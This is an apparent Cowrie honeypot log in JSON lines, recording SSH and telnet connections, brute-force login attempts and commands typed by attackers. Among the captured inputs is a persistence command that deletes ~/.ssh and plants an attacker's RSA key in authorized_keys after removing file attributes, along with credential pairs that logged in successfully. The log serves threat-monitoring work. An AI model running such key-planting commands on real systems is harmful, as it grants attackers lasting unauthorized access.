{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.879340Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.880411Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.closed","duration":12.942694187164307,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.946318Z","src_ip":"202.107.95.221","session":"20c7544351f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.055108Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37447,"dst_ip":"1.2.3.4","dst_port":23,"session":"06681c23f0dc","protocol":"telnet","message":"New connection: 202.107.95.221:37447 (1.2.3.4:23) [session: 06681c23f0dc]","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.128118Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.244256Z","src_ip":"212.227.235.229","session":"50936cb7d04a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.368463Z","src_ip":"212.227.235.229","session":"76f94af96dde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:17.423521Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.424270Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.598855Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.599774Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.638245Z","src_ip":"212.227.235.229","session":"668f74081df6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48960,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a289f51f3c2","protocol":"ssh","message":"New connection: 212.227.235.229:48960 (1.2.3.4:22) [session: 9a289f51f3c2]","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.791806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.792933Z","src_ip":"212.227.235.229","session":"9a289f51f3c2"}
{"eventid":"cowrie.session.closed","duration":12.967418193817139,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.859724Z","src_ip":"202.107.95.221","session":"7f14e74c6f4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:17.974516Z","src_ip":"212.227.235.229","session":"9a289f51f3c2"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37460,"dst_ip":"1.2.3.4","dst_port":23,"session":"6cf347a7dfc5","protocol":"telnet","message":"New connection: 202.107.95.221:37460 (1.2.3.4:23) [session: 6cf347a7dfc5]","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.030321Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.573464Z","src_ip":"212.227.235.229","session":"76f94af96dde"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.574914Z","src_ip":"212.227.235.229","session":"50936cb7d04a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.739348Z","src_ip":"212.227.235.229","session":"9a289f51f3c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38064,"dst_ip":"1.2.3.4","dst_port":22,"session":"75a6daaa0138","protocol":"ssh","message":"New connection: 212.227.235.229:38064 (1.2.3.4:22) [session: 75a6daaa0138]","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.775176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.776489Z","src_ip":"212.227.235.229","session":"75a6daaa0138"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.892901Z","src_ip":"212.227.235.229","session":"668f74081df6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48852,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca840a95cfd","protocol":"ssh","message":"New connection: 212.227.235.229:48852 (1.2.3.4:22) [session: cca840a95cfd]","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.909034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.909977Z","src_ip":"212.227.235.229","session":"cca840a95cfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:18.979636Z","src_ip":"212.227.235.229","session":"75a6daaa0138"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.243851Z","src_ip":"212.227.235.229","session":"cca840a95cfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58720,"dst_ip":"1.2.3.4","dst_port":22,"session":"721233ce81b2","protocol":"ssh","message":"New connection: 212.227.235.229:58720 (1.2.3.4:22) [session: 721233ce81b2]","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.259018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.260031Z","src_ip":"212.227.235.229","session":"721233ce81b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.566873Z","src_ip":"212.227.235.229","session":"721233ce81b2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.836601Z","src_ip":"212.227.235.229","session":"75a6daaa0138"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:19.922724Z","src_ip":"212.227.235.229","session":"9a289f51f3c2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.041758Z","src_ip":"212.227.235.229","session":"75a6daaa0138"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.042719Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48974,"dst_ip":"1.2.3.4","dst_port":22,"session":"57ab32a523ed","protocol":"ssh","message":"New connection: 212.227.235.229:48974 (1.2.3.4:22) [session: 57ab32a523ed]","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.081106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.082001Z","src_ip":"212.227.235.229","session":"57ab32a523ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.250550Z","src_ip":"212.227.235.229","session":"57ab32a523ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.614063Z","src_ip":"212.227.235.229","session":"cca840a95cfd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.838169Z","src_ip":"212.227.235.229","session":"721233ce81b2"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.942564Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.946287Z","src_ip":"212.227.235.229","session":"cca840a95cfd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:20.965650Z","src_ip":"212.227.235.229","session":"57ab32a523ed"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:21.135447Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:21.136565Z","src_ip":"212.227.235.229","session":"57ab32a523ed"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:21.145733Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:21.146812Z","src_ip":"212.227.235.229","session":"721233ce81b2"}
{"eventid":"cowrie.session.closed","duration":13.293964385986328,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:22.808205Z","src_ip":"202.107.95.221","session":"4e3630457a9e"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37507,"dst_ip":"1.2.3.4","dst_port":23,"session":"213bf3f91a94","protocol":"telnet","message":"New connection: 202.107.95.221:37507 (1.2.3.4:23) [session: 213bf3f91a94]","sensor":"my-vps","timestamp":"2025-09-08T22:16:22.966037Z"}
{"eventid":"cowrie.session.closed","duration":12.906071901321411,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.034125Z","src_ip":"202.107.95.221","session":"06681c23f0dc"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37660,"dst_ip":"1.2.3.4","dst_port":23,"session":"284c5950ac3b","protocol":"telnet","message":"New connection: 202.107.95.221:37660 (1.2.3.4:23) [session: 284c5950ac3b]","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.220220Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15654,"dst_ip":"1.2.3.4","dst_port":22,"session":"285b8c1f12e3","protocol":"ssh","message":"New connection: 212.227.125.160:15654 (1.2.3.4:22) [session: 285b8c1f12e3]","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.673965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.674711Z","src_ip":"212.227.125.160","session":"285b8c1f12e3"}
{"eventid":"cowrie.session.closed","duration":12.698031902313232,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.728279Z","src_ip":"202.107.95.221","session":"6cf347a7dfc5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.734056Z","src_ip":"212.227.125.160","session":"285b8c1f12e3"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37664,"dst_ip":"1.2.3.4","dst_port":23,"session":"27e4f6066d3f","protocol":"telnet","message":"New connection: 202.107.95.221:37664 (1.2.3.4:23) [session: 27e4f6066d3f]","sensor":"my-vps","timestamp":"2025-09-08T22:16:30.907894Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:31.053299Z","src_ip":"212.227.125.160","session":"285b8c1f12e3"}
{"eventid":"cowrie.session.connect","src_ip":"198.235.24.105","src_port":55540,"dst_ip":"1.2.3.4","dst_port":22,"session":"30b9720381e9","protocol":"ssh","message":"New connection: 198.235.24.105:55540 (1.2.3.4:22) [session: 30b9720381e9]","sensor":"my-vps","timestamp":"2025-09-08T22:16:31.839627Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:32.164179Z","src_ip":"198.235.24.105","session":"30b9720381e9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T22:16:33.782245Z","src_ip":"45.78.193.100","session":"7bfd57d45973"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:34.351604Z","src_ip":"45.78.193.100","session":"7bfd57d45973"}
{"eventid":"cowrie.session.closed","duration":"74.4","message":"Connection lost after 74.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:34.536156Z","src_ip":"45.78.193.100","session":"7bfd57d45973"}
{"eventid":"cowrie.session.closed","duration":13.019922494888306,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:35.985887Z","src_ip":"202.107.95.221","session":"213bf3f91a94"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37820,"dst_ip":"1.2.3.4","dst_port":23,"session":"5cd19d3365ba","protocol":"telnet","message":"New connection: 202.107.95.221:37820 (1.2.3.4:23) [session: 5cd19d3365ba]","sensor":"my-vps","timestamp":"2025-09-08T22:16:36.245128Z"}
{"eventid":"cowrie.session.closed","duration":12.929484128952026,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:43.149624Z","src_ip":"202.107.95.221","session":"284c5950ac3b"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37873,"dst_ip":"1.2.3.4","dst_port":23,"session":"37c36e90cd61","protocol":"telnet","message":"New connection: 202.107.95.221:37873 (1.2.3.4:23) [session: 37c36e90cd61]","sensor":"my-vps","timestamp":"2025-09-08T22:16:43.346076Z"}
